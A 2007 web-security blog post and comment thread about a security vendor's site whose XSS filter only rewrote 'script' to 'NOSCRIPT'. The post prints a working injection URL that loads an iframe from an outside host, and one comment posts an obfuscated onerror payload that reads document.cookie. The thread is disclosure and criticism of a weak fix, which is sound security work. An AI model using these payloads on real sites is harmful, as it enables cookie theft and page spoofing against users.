Paid Advertising
web application security lab
« Links Roundup
Month of Search Engine Bugs Comes To A Close »

NOSCRIPT on Cenzic

Erwin Geirnaert sent me an amusing email today about one of the links that Ronald threw up. Yes, Cenzic has had a number of XSS holes, and yes, they have tried to fix them, but they have had some problems in their fixes. Here’s Erwin’s email:

I followed this link from http://www.0×000000.com/?i=372:
http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C

The HTML source:

<a href="/forms/hailstorm.php?id=3&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_hailstorm_starter.gif" alt="Hailstorm Starter: Try for 45 Days" width="455" height="39" border="0"></a><br>

<a href="/forms/hailstorm.php?id=2&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_try_hailstorm_7days.gif" alt="Hailstorm Core: Try for 7 Days" width="455" height="39" border="0"></a><br>

<a href="/forms/hailstorm.php?id=1&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_buy_hailstorm.gif" alt="Hailstorm Core: Buy Today" width="455" height="39" border="0"></a><br>

So a page with the name NOSCRIPTlet.html will work, no?

Erwin was absolutely right, aaaabsolutely right. Cenzic attempted to mitigate the risk by changing the word “script” to “NOSCRIPT” which doesn’t do much in this case other than change the location of where the vector lives. So I went ahead and created exactly that file (NOSCRIPTlet.html) to prove the point. You cannot do simple substitutions like that and assume they will break every vector. This all comes in reaction to some rather scary patents they issued that appear to break every one else’s ability to work in the industry. Not good.

This entry was posted on Thursday, June 28th, 2007 at 12:22 pm and is filed under XSS, Webappsec. You can leave a response as well.

12 Responses to “NOSCRIPT on Cenzic”

  1. Ronald van den Heetkamp Says:
    June 28th, 2007 at 12:50 pm

    Thanks RSnake, big props to you! ;)

    I didn’t even saw this was the case btw, I was in a hurry when I posted it. :)

  2. zeno Says:
    June 28th, 2007 at 2:21 pm

    If you sell a product that finds xss, and your own site is vuln to xss, you deserve to have your hands and feet cut off for being a thief.

  3. digi7al64 Says:
    June 28th, 2007 at 9:17 pm

    lmfao - It would cenzic have been poaching the biggest, baddest and brightest that myspace has to offer.

  4. Arian Says:
    June 29th, 2007 at 1:02 pm

    While this is pretty hysterical, I get a sad gut-check when I think of the 50 + million dollars of investors’ money they are blowing on God Knows What….

    …besides fueling some crazy marketing machine.

    Seriously, this is disgusting. They are blowing millions of dollars making and selling pure crap to unsuspecting people, and they don’t even have a single employee who understands WEB APP SECURITY. I mean, read their blogs. XSS vs CSRF crap. Ridiculous. Stupid.

    Why don’t more people in the industry speak up? Cenzic is hurting *everyone*, all of us included, each time they clown a client into using paying them for a false impression of their security posture.

  5. Ronald van den Heetkamp Says:
    June 29th, 2007 at 2:10 pm

    On the contrary what many people think, I’m no security scanner vendor. I work in the field and have my own sec. company, but we do pentesting by hand, and sometimes a few scripts only to automate stuff. So regarding the Cenzic’s patents, It does not affect me. But, I am sure that many companies are being hit by it in one way or another. My motto: If you are the best, you don’t have competition and you shouldn’t be afraid by it, let alone patent stuff which is killing the industry instead of making it more transparent.

    The XSS holes are just symbols, to show what is wrong with todays understanding of web application security. I’ll hope a few lessons can be learned, I had to learn ‘em also one way or the other.

  6. Jacky Says:
    June 29th, 2007 at 5:36 pm

    Hello RSnake,

    This is a nice trick, but as far as I understand, you load a page in another domain (in this case, ha.ckers.org) using an IFRAME.
    That means that the script you load inside the IFRAME will not have access to the DOM of Cenzic’s website…

    Did I miss anything?

    Thanks,
    Jacky

  7. hackathology Says:
    June 30th, 2007 at 9:11 am

    cenzic boooooooooooooo!!#@#@

  8. RSnake Says:
    June 30th, 2007 at 12:49 pm

    @Jacky - No you didn’t miss anything. That example vector indeed can only run JavaScript in another domain, but generally when there is one vector there are many more, so I wouldn’t say that site was safe based on that idea alone. It also makes SEO blackhat URL injection possible. Also, if done properly, that attack can easily be made into a convincing site using CSS (no JS required) to make people believe they are seeing something on Cenzic that is actually on another domain. Although not as bad, it’s still far from being a safe page.

  9. beford Says:
    June 30th, 2007 at 2:55 pm

    http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Cimg+src=404+onerror=eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,97,108,101,114,116,40,39,112,119,110,101,100,39,41))%3E%3Ctextarea%3E

  10. beford Says:
    June 30th, 2007 at 3:05 pm

    ugh, it was stripped down by filters, ignore that,
    http://beford.org/cenzic.html

  11. Arian Says:
    July 2nd, 2007 at 2:59 pm

    Bedford — nice…

  12. funn Says:
    July 12th, 2007 at 3:27 am

    funny.

    i have to make a decision between spi, hailstorm and watchfire. and hailstorm is out! very lame, they are very very arrogant but not able to code a secure application. thats very lame.

Respond here or Discuss On the Forums